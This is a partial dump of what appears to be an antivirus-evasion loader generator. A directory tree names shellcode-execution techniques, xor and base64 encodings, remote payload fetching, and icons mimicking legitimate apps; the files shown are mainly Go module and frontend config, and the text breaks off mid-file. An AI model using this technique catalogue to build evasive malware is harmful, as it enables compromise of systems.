├── template ├── go │ ├── go_FlsAlloc │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_FlsAlloc.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_FlsAlloc.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_FlsAlloc.go │ │ └── base64Xor │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_FlsAlloc.go │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_FlsAlloc.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_FlsAlloc.go │ ├── go_SetTimer │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_SetTimer.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_SetTimer.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_SetTimer.go │ │ └── base64Xor │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_SetTimer.go │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_SetTimer.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_SetTimer.go │ ├── go_EnumFontsW │ │ ├── xor │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumFontsW.go │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumFontsW.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_EnumFontsW.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_EnumFontsW.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_EnumFontsW.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_EnumFontsW.go │ ├── go_EnumChildWindows │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumChildWindows.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumChildWindows.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_EnumChildWindows.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_EnumChildWindows.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_EnumChildWindows.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_EnumChildWindows.go │ ├── go_FiberContextEdit │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_FiberContextEdit.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_FiberContextEdit.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_FiberContextEdit.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_FiberContextEdit.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_FiberContextEdit.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_FiberContextEdit.go │ ├── go_SymEnumProcesses │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_SymEnumProcesses.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_SymEnumProcesses.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_SymEnumProcesses.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_SymEnumProcesses.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_SymEnumProcesses.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_SymEnumProcesses.go │ ├── go_EnumResourceTypesExW │ │ ├── xor │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumResourceTypesExW.go │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumResourceTypesExW.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_EnumResourceTypesExW.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_EnumResourceTypesExW.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_EnumResourceTypesExW.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_EnumResourceTypesExW.go │ ├── go_CertEnumSystemStore │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_CertEnumSystemStore.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_CertEnumSystemStore.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ └── go_CertEnumSystemStore.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_CertEnumSystemStore.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_CertEnumSystemStore.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ └── go_CertEnumSystemStore.go │ └── go_VirtualAlloc │ │ ├── xor │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_VirtualAlloc.go │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_VirtualAlloc.go │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_VirtualAlloc.go │ │ └── base64Xor │ │ ├── EMBEDDED │ │ ├── go.mod │ │ ├── go.sum │ │ └── go_VirtualAlloc.go │ │ ├── LOCAL │ │ ├── go.mod │ │ ├── go.sum │ │ └── go_VirtualAlloc.go │ │ └── REMOTE │ │ ├── go.mod │ │ ├── go.sum │ │ └── go_VirtualAlloc.go ├── icon │ ├── cs2.ico.o │ ├── clash.ico.o │ ├── logo.ico.o │ └── officeplus.ico.o ├── c │ └── c_VirtualAlloc │ │ └── none │ │ └── c_VirtualAlloc.c └── nim │ └── nim_VirtualAlloc │ └── xor │ ├── LOCAL │ └── nim_VirtualAlloc.nim │ └── EMBEDDED │ └── nim_VirtualAlloc.nim ├── images ├── 012.png ├── 013.png ├── image-20240124190806863.png ├── image-20240131132406380.png ├── 1f1fcd7d8144ac62d2431f09f70e5d6f.png ├── 30a135832100b1f991bf0667c9c7acf9.png ├── 54f5d229cdb4bd95e963b7c300994511.png └── 9db0f1cafb5eaa819a0f2a86352876fb.png ├── AVEvasionCraftOnline-Frontend ├── .vscode │ └── extensions.json ├── public │ └── logo.ico ├── src │ ├── views │ │ └── AboutView.vue │ ├── assets │ │ ├── logo.png │ │ ├── logo1.png │ │ └── vue.svg │ ├── store │ │ └── index.js │ ├── api │ │ ├── table.js │ │ ├── compile.js │ │ └── user.js │ ├── utils │ │ ├── auth.js │ │ └── request.js │ ├── components │ │ ├── HelloWorld.vue │ │ └── ProcessValueLookup.vue │ ├── main.js │ ├── router │ │ └── index.js │ ├── style-dark.css │ ├── style.css │ └── App.vue ├── .prettierrc.json ├── .env.production ├── .env.development ├── .gitignore ├── index.html ├── .eslintrc.cjs ├── README.md ├── package.json └── vite.config.js ├── AVEvasionCraftOnline-Backend ├── .mvn │ └── wrapper │ │ ├── maven-wrapper.jar │ │ └── maven-wrapper.properties ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── yutian4060 │ │ │ │ └── avevasioncraftonline │ │ │ │ ├── dto │ │ │ │ ├── CompilationResponseDTO.java │ │ │ │ └── ShellcodeUploadDTO.java │ │ │ │ ├── AvEvasionCraftOnlineApplication.java │ │ │ │ ├── service │ │ │ │ └── CompileService.java │ │ │ │ ├── controller │ │ │ │ ├── BypassAVConfigController.java │ │ │ │ └── CompilerController.java │ │ │ │ ├── config │ │ │ │ └── BypassAVConfigProperties.java │ │ │ │ ├── enums │ │ │ │ └── Result.java │ │ │ │ └── utils │ │ │ │ ├── ShellcodeProcessor.java │ │ │ │ ├── TextFileProcessor.java │ │ │ │ ├── CompilerCode.java │ │ │ │ └── FileUtils.java │ │ └── resources │ │ │ └── application.yaml │ └── test │ │ └── java │ │ └── com │ │ └── yutian4060 │ │ └── avevasioncraftonline │ │ └── utils │ │ ├── ShellcodeProcessorTest.java │ │ ├── CompilerCodeTest.java │ │ ├── FileUtilsTest.java │ │ └── TextFileProcessorTest.java ├── .gitignore └── pom.xml ├── LICENSE ├── README.md └── application.yaml /template/go/go_FlsAlloc/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /images/012.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/012.png -------------------------------------------------------------------------------- /images/013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/013.png -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["Vue.volar"] 3 | } 4 | -------------------------------------------------------------------------------- /template/icon/cs2.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/cs2.ico.o -------------------------------------------------------------------------------- /template/icon/clash.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/clash.ico.o -------------------------------------------------------------------------------- /template/icon/logo.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/logo.ico.o -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/icon/officeplus.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/officeplus.ico.o -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.18 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /images/image-20240124190806863.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/image-20240124190806863.png -------------------------------------------------------------------------------- /images/image-20240131132406380.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/image-20240131132406380.png -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.18 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /images/1f1fcd7d8144ac62d2431f09f70e5d6f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/1f1fcd7d8144ac62d2431f09f70e5d6f.png -------------------------------------------------------------------------------- /images/30a135832100b1f991bf0667c9c7acf9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/30a135832100b1f991bf0667c9c7acf9.png -------------------------------------------------------------------------------- /images/54f5d229cdb4bd95e963b7c300994511.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/54f5d229cdb4bd95e963b7c300994511.png -------------------------------------------------------------------------------- /images/9db0f1cafb5eaa819a0f2a86352876fb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/9db0f1cafb5eaa819a0f2a86352876fb.png -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/public/logo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Frontend/public/logo.ico -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/views/AboutView.vue: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/assets/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Frontend/src/assets/logo.png -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/assets/logo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Frontend/src/assets/logo1.png -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/.mvn/wrapper/maven-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Backend/.mvn/wrapper/maven-wrapper.jar -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.prettierrc.json: -------------------------------------------------------------------------------- 1 | { 2 | "semi": false, 3 | "singleQuote": true, 4 | "printWidth": 80, 5 | "trailingComma": "none", 6 | "arrowParens": "avoid" 7 | } 8 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/EMBEDDED/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/LOCAL/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/LOCAL/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/EMBEDDED/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.env.production: -------------------------------------------------------------------------------- 1 | # 线上环境 2 | NODE_ENV = 'production' 3 | 4 | # 暴露必须以VITE开头才能被Vite识别 5 | 6 | VITE_BASE_API = '/' 7 | 8 | # 线上环境接口地址 9 | VITE_API_URL = 'http://192.168.99.111:8080/' 10 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/store/index.js: -------------------------------------------------------------------------------- 1 | import { createStore } from 'vuex' 2 | 3 | export default createStore({ 4 | state: {}, 5 | getters: {}, 6 | mutations: {}, 7 | actions: {}, 8 | modules: {} 9 | }) 10 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.env.development: -------------------------------------------------------------------------------- 1 | # 本地环境 2 | NODE_ENV = 'development' 3 | 4 | # 暴露必须以VITE开头才能被Vite识别 5 | 6 | VITE_BASE_API = '/dev-api' 7 | 8 | # 本地环境接口地址 9 | VITE_API_URL = 'http://127.0.0.1:8080/' 10 | //与后台在同一局域网,这个他电脑的ip 11 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/api/table.js: -------------------------------------------------------------------------------- 1 | import request from '@/utils/request' 2 | 3 | export function getList(params) { 4 | return request({ 5 | url: '/vue-admin-template/table/list', 6 | method: 'get', 7 | params 8 | }) 9 | } 10 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/.mvn/wrapper/maven-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.9.5/apache-maven-3.9.5-bin.zip 2 | wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.2.0/maven-wrapper-3.2.0.jar 3 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/dto/CompilationResponseDTO.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.dto; 2 | 3 | import lombok.*; 4 | 5 | @Getter 6 | @Setter 7 | @AllArgsConstructor 8 | public class CompilationResponseDTO { 9 | private String downloadLink; 10 | } 11 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 